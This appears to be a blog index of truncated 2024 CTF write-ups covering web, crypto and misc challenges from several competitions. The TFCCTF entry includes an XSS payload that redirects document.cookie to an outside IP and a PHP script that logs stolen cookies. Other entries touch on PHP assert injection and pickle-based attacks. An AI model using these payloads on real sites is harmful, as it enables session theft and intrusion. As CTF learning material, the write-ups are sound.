CNSS Summer 2024 WriteUp
Web
🦴 babyHTTP
Key points: GET, POST, Cookie, and HTTP basics
🙋🏼♀️ PHPinfo
Key point: phpinfo()
http://111.229.23.244:50002/phpinfo.php
Ctrl+F, search for cnss
🥇 I need to be faster
Use a regular expression to grab the value of Key from the front-end page, MD5-hash it, then send the payload with Python.
import requests
import re
from hashlib import md5
url = 'http://152.136.11.155:10103'
# Fetch the page content in a loop
while True:
    response = requests.get(url, timeout=1)
    # Use a regular expression to match the string after Key
    pattern = r'Key : (\w+)'
    # Search for the matching string
    match = re.search(pattern, response.text)
    s = match.group(1)
    str = md5(s.e ...
The 2nd 煽密杯 (Shanmi Cup)
Also represented Sloth at this one; the seniors didn't come, three web players went, and I count as maybe half a crypto player? The two web juniors just stared blankly...
Still too weak, QWQ. When the final ranking came out, we seemed to be around 98th...
Scored zero here, QWQ
Ostensibly went to compete, actually went sightseeing in Yinchuan (jk)
Initial Puzzle 1
Challenge
from sympy import Mod, Integer
from sympy.core.numbers import mod_inverse
# Modulus
N_HEX = "FFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123"
MODULUS = Integer(int(N_HEX, 16))
MSG_PREFIX = "CryptoCup message:"
# Encryption function
def encrypt_message(message, key):
    # Add the prefix
    message_with_prefix = MSG_PREFIX + message
    message_bytes = message_with_prefix.encod ...
Yangcheng Cup (羊城杯) 2024 WP
Team Sloth
Rank: 60/588
My writeups are below.
Web
Lyrics For You
Referencing https://www.cjxol.com/posts/sekaictf-2022-writeup/
/proc/self/cmdline,得到python3-u/usr/etc/app/app.py
../../app/app.py
import os
import random
from config.secret_key import secret_code
from flask import Flask, make_response, request, render_template
from cookie import set_cookie, cookie_check, get_cookie
import pickle
app = Flask(__name__)
app.secret_key = random.randbytes(16)
class UserData:
    def __init__(self, username):
        self.username = usern ...
DASCTF 2024 August Back-to-School Season
CHECKIN
8.24
Obvious at a glance: the comment section.
Crypto
EZsquares
from Crypto.Util.number import *
from gmpy2 import *
from secret import flag
p=getPrime(512)
q=getPrime(512)
n0=p**2+q**2
print('n0 =',n0)
e=65537
n=p*q
m=bytes_to_long(flag)
c=pow(m,e,n)
print('c =',c)
# n0 = 1925737445386391308458687270140759676695136677633159341618496205316835366963761383033206819227820030880945397242381091164164562944724610756685680886882872098988509850246324632519843238887652499502695950456484351920479909405938170869183992124 ...
The 4th 山石 (Hillstone) CTF Training Camp
The 4th 山石 CTF Training Camp closing (recruitment) competition, which ended on the afternoon of the 9th (three hours long).
Misc
Sign-in
Official WeChat account
ayyctf{W3lc0me_CTFers_7hIs_1s_yOur_fI4g}
play4fun
Binary in 8-bit groups > base64
ayyctf{c0de_1s_funnn!!!}
dog
Clearly the width/height are wrong; repair them from the CRC value, using an automated tool directly (lazy).
python Deformed-Image-Restorer.py -i dog.png
Automatic repair
timestamp
Open it directly with Bandizip; it matches the flag header ayyctf and the timestamps line up exactly, so just extract it.
s = [97, 121, 121, 99, 116, 102, 123, 52, 49, 101, 49, 45, 98, 101, 99, 54, 45, 101, 102, 97, 49, 57, 125]
for i in s:
    print(chr(i), end='')
ayyctf{41e1-bec6-efa19}
Saw the official account say that the tx ...
TFCCTF2024&CrewCTF2024
TFCCTF
https://ctf.thefewchosen.com
Web
GREETINGS
At first it felt like XSS was possible, because the body tag could be used
<body onload=alert(`ls`);>
Then put an xss.php on the VPS
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
<body onload="window.location.href='http://8.138.168.65/xss.php?cookie='+document.cookie">
Tried it, no use at all, no response, so it's not XSS then
A master in the group solved it, Orz; it's Pug SSTI. I had also noticed X-Powered-By: Express at the start. Express is a Node.js web framework, and the Express framework ...
DeadSec CTF2024
Competition URL
https://deadsec.ctf.ae/
Misc
Welcome
Mic check
Simple, just write a script that interacts 100 times.
from pwn import *
p = remote('ip', port)
for i in range(100):
    s = p.recvline()
    print(s)
    r = s[12:13+i]
    print(r)
    p.sendlineafter(b'submit test words > ', r)
p.interactive()
MAN in the middle
You can see there are only two waveform levels, top and bottom. Binary? The last segment can be ignored.
But the amount of data is huge; extracting it by hand is unrealistic.
Looking at the hex in 010 Editor, FF 7F repeated 44 times counts as one segment, and 01 80 repeated 44 times also counts as one segment.
Treating the former as 1 and the latter as 0 doesn't decode; try 01 as 1 and 10 as 0.
from Crypto.Util.number import *
with open("MIM.MP3", 'rb') as f:
    a ...
DASCTF 2024 Summer Challenge
Emmm, only solved one simple knapsack cipher; for the Misc image challenge I was missing the third part of the flag.
Official writeup: https://www.yuque.com/yuqueyonghu30d1fk/gd2y5h/yleeg03c0ucdoac6
Crypto
complex_enc
Superincreasing knapsack problem
c = 287687761937146187597379915545639385740275457170939564210821293233370716878150576
key = [...]
flag = ''
for i in key[::-1]:
    if i <= c:
        flag += '1'
        c -= i
    else:
        flag += '0'
flag = flag[::-1]
for i in range(0, len(flag), 8):
    print(chr(int(flag[i:i+8], 2)), end='')
# DASCTF{you_kn0w_b@ckpack ...
ImaginaryCTF2024
Web
readme
Download the file and look at the Dockerfile
ictf{path_normalization_to_the_rescue}
journal
if (isset($_GET['file'])) {
    $file = $_GET['file'];
    $filepath = './files/' . $file;
    assert("strpos('$file', '..') === false") or die("Invalid file!");
    if (file_exists($filepath)) {
        include($filepath);
    } else {
        echo 'File not found!';
    }
}
Wanted to read ../../../../../flag, but directory traversal can't be used here.
Can make use of assert, taking the preceding ...
OSCTF2024
HITCON CTF 2024 Quals was a bit...
Might as well play OSCTF 2024 instead; competition URL
https://ctf.os.ftp.sh/
Web
Introspection
script.js
function checkFlag() {
    const flagInput = document.getElementById('flagInput').value;
    const result = document.getElementById('result');
    const flag = "OSCTF{Cr4zY_In5P3c71On}";
    if (flagInput === flag) {
        result.textContent = "Congratulations! You found the flag!";
        result.style.color = "green";
    } else ...